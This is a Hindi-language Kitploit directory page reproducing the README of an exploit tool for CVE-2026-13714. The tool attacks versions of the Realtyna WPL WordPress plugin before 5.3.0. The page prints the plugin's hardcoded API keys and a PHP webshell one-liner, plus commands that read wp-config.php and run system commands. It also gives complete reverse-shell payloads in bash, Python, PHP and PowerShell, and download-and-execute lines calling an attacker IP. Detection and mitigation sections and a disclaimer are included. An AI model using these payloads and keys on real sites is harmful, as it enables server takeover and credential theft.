Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-13714 — Realtyna WPL < 5.3.0 के लिए बिना प्रमाणीकरण वाला RCE एक्सप्लॉइट जो हार्डकोडेड API कुंजी के माध्यम से PHP वेबशेल अपलोड करता है और मनमाने सिस्टम कमांड निष्पादित करता है। | Kitploit
उपकरण/GitHubGitHub/katransefa/cve-2026-13714
शोषणवेब एप्लिकेशन शोषणपोस्ट-शोषणपेनिट्रेशन टेस्टिंगपेलोड डेवलपमेंट
GitHubkatransefa/cve-2026-13714

CVE-2026-13714

Realtyna WPL < 5.3.0 के लिए बिना प्रमाणीकरण वाला RCE एक्सप्लॉइट जो हार्डकोडेड API कुंजी के माध्यम से PHP वेबशेल अपलोड करता है और मनमाने सिस्टम कमांड निष्पादित करता है।

रिपॉजिटरी देखें
423 दिन पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Realtyna WPL < 5.3.0 - बिना प्रमाणीकरण के RCE एक्सप्लॉइट

विवरण

यह एक्सप्लॉइट Realtyna Organic IDX + WPL Real Estate प्लगइन के 5.3.0 से पहले के संस्करणों में एक गंभीर भेद्यता को लक्षित करता है। प्लगइन हार्डकोडेड क्रेडेंशियल्स का उपयोग करता है और बिना प्रमाणीकरण के फ़ाइल अपलोड की अनुमति देता है, जो रिमोट कोड निष्पादन (RCE) की ओर ले जाता है।

भेद्यता विवरण

  • CVE ID: CVE-2026-13714
  • प्रभावित संस्करण: < 5.3.0
  • प्रकार: बिना प्रमाणीकरण के मनमाना फ़ाइल अपलोड से RCE
  • शोधकर्ता: Thom Stackhouse

तकनीकी विवरण

प्लगइन में डिफ़ॉल्ट रूप से I/O API सक्षम है जिसमें हार्डकोडेड क्रेडेंशियल्स हैं:

  • io_public_key = U7hdbv673YhdjplzzX7wU7hdbv673YhdjplzzX7w
  • io_private_key = Eft76bdh0o2uyhJkbG3T

API फ़ाइल प्रकारों को मान्य नहीं करता है, जिससे मनमानी PHP फ़ाइलें अपलोड की जा सकती हैं।

स्थापना

root@kitploit:~
# Clone or download the script
git clone https://github.com/yourusername/wpl-rce-exploit.git
cd wpl-rce-exploit

# Install dependencies
pip install requests urllib3

उपयोग

बुनियादी उपयोग

root@kitploit:~
# Upload webshell only
python exploit.py -u https://target.com/wordpress

# Execute a command
python exploit.py -u https://target.com/wordpress -c "whoami"

# Multiple commands
python exploit.py -u https://target.com/wordpress -c "id"  # Linux
python exploit.py -u https://target.com/wordpress -c "systeminfo"  # Windows

सामान्य कमांड्स

Linux लक्ष्य

root@kitploit:~
# System information
python exploit.py -u https://target.com -c "uname -a"

# Current user
python exploit.py -u https://target.com -c "whoami"

# List files
python exploit.py -u https://target.com -c "ls -la"

# Read wp-config.php
python exploit.py -u https://target.com -c "cat wp-config.php"

# Network information
python exploit.py -u https://target.com -c "ifconfig"
python exploit.py -u https://target.com -c "netstat -tulpn"

Windows लक्ष्य

root@kitploit:~
# System information
python exploit.py -u https://target.com -c "systeminfo"

# Current user
python exploit.py -u https://target.com -c "whoami"

# List files
python exploit.py -u https://target.com -c "dir"

# Read wp-config.php
python exploit.py -u https://target.com -c "type wp-config.php"

# Network information
python exploit.py -u https://target.com -c "ipconfig"
python exploit.py -u https://target.com -c "netstat -ano"

उन्नत उपयोग

रिवर्स शेल (Linux)

root@kitploit:~
# Netcat reverse shell
python exploit.py -u https://target.com -c "bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"

# Python reverse shell
python exploit.py -u https://target.com -c "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"YOUR_IP\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"])'"

# PHP reverse shell
python exploit.py -u https://target.com -c "php -r '\$sock=fsockopen(\"YOUR_IP\",4444);exec(\"/bin/sh -i <&3 >&3 2>&3\");'"

रिवर्स शेल (Windows)

root@kitploit:~
# PowerShell reverse shell
python exploit.py -u https://target.com -c "powershell -c \"\$client = New-Object System.Net.Sockets.TCPClient('YOUR_IP',4444);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()\""

कस्टम पेलोड अपलोड करें और निष्पादित करें

root@kitploit:~
# Download and execute (Windows)
python exploit.py -u https://target.com -c "certutil -urlcache -f http://YOUR_IP/payload.exe C:\temp\payload.exe && C:\temp\payload.exe"

# Download and execute (Linux)
python exploit.py -u https://target.com -c "wget http://YOUR_IP/payload -O /tmp/payload && chmod +x /tmp/payload && /tmp/payload"

एक्सप्लॉइट प्रवाह

  1. अपलोड: एक PHP वेबशेल (<?php system($_GET['c']); ?>) अपलोड करता है
  2. स्थान: फ़ाइल wp-content/uploads/WPL/<ID>/shell.php पर सहेजी जाती है
  3. निष्पादन: shell.php?c=COMMAND के माध्यम से कमांड निष्पादित करें

पहचान

एक्सप्लॉइट का पता कैसे लगाएं

  • /wp-content/uploads/WPL/*/ में संदिग्ध फ़ाइलों की जाँच करें
  • इन पैरामीटर वाले अनुरोधों की निगरानी करें: wplview=io, wplformat=io, cmd=set_property
  • हार्डकोडेड क्रेडेंशियल्स वाले संदिग्ध API अनुरोधों को देखें

समझौते के संकेत

  • अपलोड निर्देशिकाओं में अप्रत्याशित PHP फ़ाइलें
  • सिस्टम कमांड वाले असामान्य वेब अनुरोध
  • WordPress में नए एडमिन उपयोगकर्ता
  • संशोधित .htaccess फ़ाइलें

शमन

समाधान

  1. तुरंत अपडेट करें WPL Real Estate संस्करण 5.3.0 या उससे अधिक पर
  2. यदि अपडेट करना संभव न हो, तो I/O API अक्षम करें:
    root@kitploit:~
    // Add to wp-config.php
    define('WPL_IO_STATUS', 0);
    
  3. हार्डकोडेड क्रेडेंशियल्स बदलें
  4. उचित फ़ाइल प्रकार सत्यापन लागू करें
  5. फ़ाइल अपलोड निर्देशिकाओं को प्रतिबंधित करें

सुरक्षा अनुशंसाएँ

  • सभी WordPress प्लगइन्स को अपडेट रखें
  • वेब एप्लिकेशन फ़ायरवॉल (WAF) का उपयोग करें
  • नियमित सुरक्षा ऑडिट करें
  • फ़ाइल अपलोड निर्देशिकाओं की निगरानी करें
  • अनावश्यक APIs अक्षम करें

स्क्रीनशॉट

सफल एक्सप्लॉइट

root@kitploit:~
[+] Realtyna WPL < 5.3.0 RCE Exploit
[+] Target: https://localhost/wordpress/
[+] Command: whoami
[+] Uploading webshell...
[+] File uploaded successfully!
[+] Webshell found at: wp-content/uploads/WPL/1/shell.php
[+] Command output:
desktop-0s8mt1v\kg

अस्वीकरण

यह एक्सप्लॉइट केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए है। उन सिस्टमों के विरुद्ध अनधिकृत उपयोग जिनके स्वामी आप नहीं हैं या जिनके परीक्षण की अनुमति आपके पास नहीं है, अवैध है। लेखक दुरुपयोग के लिए कोई ज़िम्मेदारी नहीं लेता है।

कानूनी उपयोग

  • केवल उन्हीं सिस्टमों पर उपयोग करें जिनके आप स्वामी हैं
  • केवल स्पष्ट लिखित अनुमति के साथ उपयोग करें
  • ज़िम्मेदार प्रकटीकरण (responsible disclosure) प्रथाओं का पालन करें
  • भेद्यताओं की सूचना विक्रेताओं को दें

लाइसेंस

यह प्रोजेक्ट केवल शैक्षिक उद्देश्यों के लिए है। अपने जोखिम पर उपयोग करें।

श्रेय

  • मूल शोधकर्ता: Thom Stackhouse
  • CVE: CVE-2026-13714
  • WPVDB ID: 69f9dcd8-ab3c-46ed-ac6b-2f1db35f8d1f

संदर्भ

  • WPScan भेद्यता पृष्ठ
  • CVE-2026-13714

परिवर्तन लॉग

v1.0 (2026-08-17)

  • प्रारंभिक रिलीज़
  • बिना प्रमाणीकरण के फ़ाइल अपलोड
  • रिमोट कोड निष्पादन
  • कमांड निष्पादन समर्थन

योगदान

सुधारों के लिए बेझिझक issues और pull requests सबमिट करें।

सहायता

समस्याओं और प्रश्नों के लिए, कृपया GitHub पर एक issue खोलें।


⚠️ चेतावनी: यह टूल केवल सुरक्षा अनुसंधान और शैक्षिक उद्देश्यों के लिए प्रदान किया गया है। किसी भी सिस्टम का परीक्षण करने से पहले हमेशा उचित प्राधिकरण प्राप्त करें।

टूल डाउनलोड करें